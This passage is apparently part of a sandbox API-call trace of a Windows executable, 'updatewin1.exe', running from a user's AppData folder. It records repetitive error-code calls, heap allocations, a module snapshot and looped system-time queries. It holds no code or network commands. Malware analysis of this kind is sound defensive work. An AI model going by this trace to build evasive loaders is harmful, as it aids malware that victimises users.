halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe")) returned 0x5f [0167.298] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] GetLastError () returned 0x0 [0167.298] SetLastError (dwErrCode=0x0) [0167.298] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.299] SetLastError (dwErrCode=0x0) [0167.299] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.300] SetLastError (dwErrCode=0x0) [0167.300] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.301] SetLastError (dwErrCode=0x0) [0167.301] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.302] SetLastError (dwErrCode=0x0) [0167.302] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.303] GetLastError () returned 0x0 [0167.303] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.304] SetLastError (dwErrCode=0x0) [0167.304] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.305] SetLastError (dwErrCode=0x0) [0167.305] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.306] SetLastError (dwErrCode=0x0) [0167.306] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.307] SetLastError (dwErrCode=0x0) [0167.307] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x74) returned 0x2e1990 [0167.308] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] GetLastError () returned 0x0 [0167.308] SetLastError (dwErrCode=0x0) [0167.308] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.309] GetLastError () returned 0x0 [0167.309] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.310] SetLastError (dwErrCode=0x0) [0167.310] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.311] SetLastError (dwErrCode=0x0) [0167.311] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.312] SetLastError (dwErrCode=0x0) [0167.312] GetLastError () returned 0x0 [0167.313] SetLastError (dwErrCode=0x0) [0167.313] GetLastError () returned 0x0 [0167.313] SetLastError (dwErrCode=0x0) [0167.313] GetLastError () returned 0x0 [0167.313] SetLastError (dwErrCode=0x0) [0167.313] GetLastError () returned 0x0 [0167.313] SetLastError (dwErrCode=0x0) [0167.313] GetLastError () returned 0x0 [0167.313] SetLastError (dwErrCode=0x0) [0167.313] GetLastError () returned 0x0 [0167.313] SetLastError (dwErrCode=0x0) [0167.313] GetLastError () returned 0x0 [0167.313] SetLastError (dwErrCode=0x0) [0167.313] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.314] SetLastError (dwErrCode=0x0) [0167.314] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.315] SetLastError (dwErrCode=0x0) [0167.315] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.316] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.316] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.316] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.316] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.316] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.316] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.316] GetLastError () returned 0x0 [0167.316] SetLastError (dwErrCode=0x0) [0167.317] GetLastError () returned 0x0 [0167.317] SetLastError (dwErrCode=0x0) [0167.317] GetLastError () returned 0x0 [0167.317] SetLastError (dwErrCode=0x0) [0167.317] GetLastError () returned 0x0 [0167.317] SetLastError (dwErrCode=0x0) [0167.317] GetLastError () returned 0x0 [0167.317] SetLastError (dwErrCode=0x0) [0167.317] GetLastError () returned 0x0 [0167.317] SetLastError (dwErrCode=0x0) [0167.317] GetLastError () returned 0x0 [0167.317] SetLastError (dwErrCode=0x0) [0167.317] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.318] SetLastError (dwErrCode=0x0) [0167.318] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.319] GetLastError () returned 0x0 [0167.319] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] GetLastError () returned 0x0 [0167.320] SetLastError (dwErrCode=0x0) [0167.320] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x98) returned 0x2e1a10 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f) returned 0x2e1ab0 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x36) returned 0x2e1ad8 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x37) returned 0x2e1b18 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x3c) returned 0x2e1b58 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x31) returned 0x2e1ba0 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x17) returned 0x2e1be0 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x24) returned 0x2e1c00 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x14) returned 0x2e1c30 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xd) returned 0x2e1c50 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x25) returned 0x2e1c68 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x39) returned 0x2e1c98 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x18) returned 0x2e1ce0 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x17) returned 0x2e1d00 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe) returned 0x2e1d20 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x69) returned 0x2e1d38 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x3e) returned 0x2e1db0 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1b) returned 0x2e1df8 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1d) returned 0x2e1e20 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x48) returned 0x2e1e48 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2e1e98 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x18) returned 0x2e1eb8 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1b) returned 0x2e1ed8 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x24) returned 0x2e1f00 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x29) returned 0x2e1f30 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1e) returned 0x2e1f68 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x41) returned 0x2e1f90 [0167.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x17) returned 0x2e1fe8 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xf) returned 0x2e2008 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x16) returned 0x2e2020 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x2a) returned 0x2e2040 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x29) returned 0x2e2078 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x15) returned 0x2e20b0 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1e) returned 0x2e20d0 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x2a) returned 0x2e20f8 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2e2130 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x18) returned 0x2e2150 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x46) returned 0x2e2170 [0167.322] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e11f8 | out: hHeap=0x2e0000) returned 1 [0167.324] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x800) returned 0x2e21c0 [0167.324] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x80) returned 0x2e11f8 [0167.325] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0167.326] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e11f8) returned 0x80 [0167.326] GetLastError () returned 0x0 [0167.326] SetLastError (dwErrCode=0x0) [0167.326] GetLastError () returned 0x0 [0167.326] SetLastError (dwErrCode=0x0) [0167.326] GetLastError () returned 0x0 [0167.326] SetLastError (dwErrCode=0x0) [0167.326] GetLastError () returned 0x0 [0167.327] SetLastError (dwErrCode=0x0) [0167.327] GetLastError () returned 0x0 [0167.327] SetLastError (dwErrCode=0x0) [0167.327] GetLastError () returned 0x0 [0167.327] SetLastError (dwErrCode=0x0) [0167.327] GetLastError () returned 0x0 [0167.327] SetLastError (dwErrCode=0x0) [0167.327] GetLastError () returned 0x0 [0167.327] SetLastError (dwErrCode=0x0) [0167.327] GetLastError () returned 0x0 [0167.327] SetLastError (dwErrCode=0x0) [0167.327] GetLastError () returned 0x0 [0167.327] SetLastError (dwErrCode=0x0) [0167.327] GetLastError () returned 0x0 [0167.328] SetLastError (dwErrCode=0x0) [0167.328] GetLastError () returned 0x0 [0167.328] SetLastError (dwErrCode=0x0) [0167.328] GetLastError () returned 0x0 [0167.328] SetLastError (dwErrCode=0x0) [0167.328] GetLastError () returned 0x0 [0167.328] SetLastError (dwErrCode=0x0) [0167.328] GetLastError () returned 0x0 [0167.328] SetLastError (dwErrCode=0x0) [0167.328] GetLastError () returned 0x0 [0167.328] SetLastError (dwErrCode=0x0) [0167.328] GetLastError () returned 0x0 [0167.328] SetLastError (dwErrCode=0x0) [0167.328] GetLastError () returned 0x0 [0167.329] SetLastError (dwErrCode=0x0) [0167.329] GetLastError () returned 0x0 [0167.338] SetLastError (dwErrCode=0x0) [0167.338] GetLastError () returned 0x0 [0167.338] SetLastError (dwErrCode=0x0) [0167.339] GetLastError () returned 0x0 [0167.339] SetLastError (dwErrCode=0x0) [0167.339] GetLastError () returned 0x0 [0167.339] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0167.339] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0167.339] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0167.340] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0167.342] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0167.343] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0167.343] GetTickCount () returned 0x1159270 [0167.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.343] GetACP () returned 0x4e4 [0167.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.343] GetACP () returned 0x4e4 [0167.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.343] GetACP () returned 0x4e4 [0167.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.343] GetACP () returned 0x4e4 [0167.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.344] GetACP () returned 0x4e4 [0167.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.344] GetACP () returned 0x4e4 [0167.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.344] GetACP () returned 0x4e4 [0167.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.344] GetACP () returned 0x4e4 [0167.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.344] GetACP () returned 0x4e4 [0167.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.344] GetACP () returned 0x4e4 [0167.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.344] GetACP () returned 0x4e4 [0167.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, 